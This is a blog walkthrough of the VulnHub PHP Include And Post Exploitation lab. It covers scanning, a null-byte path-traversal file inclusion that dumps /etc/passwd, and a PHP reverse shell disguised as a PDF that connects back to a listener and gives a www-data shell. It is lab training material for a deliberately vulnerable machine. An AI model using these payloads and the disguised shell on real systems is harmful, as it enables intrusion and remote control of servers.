November 6, 2019 · Basic Pen-Testing

10.4 : Web app exploitation - Local file inclusion (Part IV)

Cracking PHP Include And Post Exploitation lab

Before we start cracking Web app, lets try to crack PHP Include And Post Exploitation lab.

Download here, php_include_and_post_exploitation.iso , mount as live CD
https://www.vulnhub.com/entry/pentester-lab-php-include-and-post-exploitation,79/

Recon

We can use the traditional netdiscover for basic sniff, and nmap for detailed sniff.

netdiscover

 Currently scanning: 172.16.138.0/16   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:00      1      60  Unknown vendor
 192.168.56.100  08:00:27:75:46:19      1      60  PCS Systemtechnik GmbH
 192.168.56.104  08:00:27:b0:86:4d      1      60  PCS Systemtechnik GmbH

192.168.56.104 is our target.

nmap

[email protected]:/etc/nginx# nmap -sSV --version-intensity 9 192.168.56.104
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-05 20:31 PST
Nmap scan report for 192.168.56.104
Host is up (0.00024s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.16 ((Debian))
MAC Address: 08:00:27:B0:86:4D (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.89 seconds

Only the port 80 is open for attack.

Screen-Shot-2019-11-06-at-12.38.55-PM

CVE & Vul scanning

nikto

nikto -h 192.168.56.104
[email protected]:/etc/nginx# nikto -h 192.168.56.104
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.104
+ Target Hostname:    192.168.56.104
+ Target Port:        80
+ Start Time:         2019-11-05 21:11:19 (GMT-8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.16 (Debian)
+ Retrieved x-powered-by header: PHP/5.3.2
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the M
IME type
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?
id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Apache/2.2.16 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0
.0.1".
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /index.php: PHP include error may indicate local or remote file inclusion is possible.
+ OSVDB-3126: /submit?setoption=q&option=allowed_ips&value=255.255.255.255: MLdonkey 2.x allows administrative interface access to be access from
 any IP. This is typically only found on port 4080.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain s
pecific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain s
pecific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain s
pecific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain s
pecific QUERY strings.
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3092: /login/: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 3513, size: 5108, mtime: Tue Aug 28 03:48:10 2007
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 8725 requests: 0 error(s) and 23 item(s) reported on remote host
+ End Time:           2019-11-05 21:11:32 (GMT-8) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Lets try local file inclusion

curl --path-as-is http://192.168.56.104/index.php?page=../../../../../../../../etc/passwd

  <div class="block" id="block-text">
    <div class="secondary-navigation">

      <div class="content">

Warning: include(../../../../../../../../etc/passwd.php): failed to open stream: No such file or directory in /var/www/index.php on line 28

Warning: include(): Failed opening '../../../../../../../../etc/passwd.php' for inclusion (include_path='.:') in /var/www/index.php on line 28
     </div>

    </div>
  </div>




        <div id="footer">
          <div class="block">
            <p>Copyright </p>
          </div>
        </div>

      </div>

In old version of php, the %00 null byte attack works to break the file inclusion.
https://security.stackexchange.com/questions/66414/getting-null-byte-injection-attacks-to-work-with-php-5-2-17
lets try this again.

[email protected]:/etc/nginx# curl --path-as-is http://192.168.56.104/index.php?page=../../../../../../../../etc/passwd%00

  <div class="block" id="block-text">
    <div class="secondary-navigation">

      <div class="content">
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
mysql:x:101:103:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
user:x:1000:1000:Debian Live user,,,:/home/user:/bin/bash
     </div>

    </div>
  </div>

Upload reverse shell & craft a PDF attack vector

Got it... Also we can craft a php reverse shell and try to upload it.
For this case, we are using pentest monkey reverse shell
https://github.com/pentestmonkey/php-reverse-shell

curl https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php > shell.pdf

Edit it with your favourite text editor, and we add %PDF-1.4 to camouflage it. Also, we need to change the connection string.

%PDF-1.4

<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 [email protected]
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  The author accepts no liability
// for damage caused by this tool.  If these terms are not acceptable to you, then
// do not use this tool.
//
....
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.56.101';  // CHANGE THIS
$port = 4444;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

It should be something like this.

Lets back to your kali linux, and start listening on port 4444

[email protected]:/etc/nginx# nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

upload it the shell.pdf and go to 192.168.56.104/index.php?page=uploads/shell.pdf%00

Screen-Shot-2019-11-06-at-1.24.47-PM

[email protected]:/etc/nginx# nc -lnvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.56.104.
Ncat: Connection from 192.168.56.104:33439.
Linux debian 2.6.32-5-amd64 #1 SMP Thu Mar 22 17:26:33 UTC 2012 x86_64 GNU/Linux
 05:24:23 up 57 min,  6 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              [email protected]   IDLE   JCPU   PCPU WHAT
user     tty2                      04:27   56:59   0.00s  0.00s -bash
user     tty3                      04:27   56:59   0.00s  0.00s -bash
user     tty4                      04:27   56:59   0.00s  0.00s -bash
user     tty5                      04:27   56:59   0.00s  0.00s -bash
user     tty6                      04:27   56:59   0.00s  0.00s -bash
user     tty1                      04:27   56:59   0.00s  0.00s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ whoami
www-data

Got it.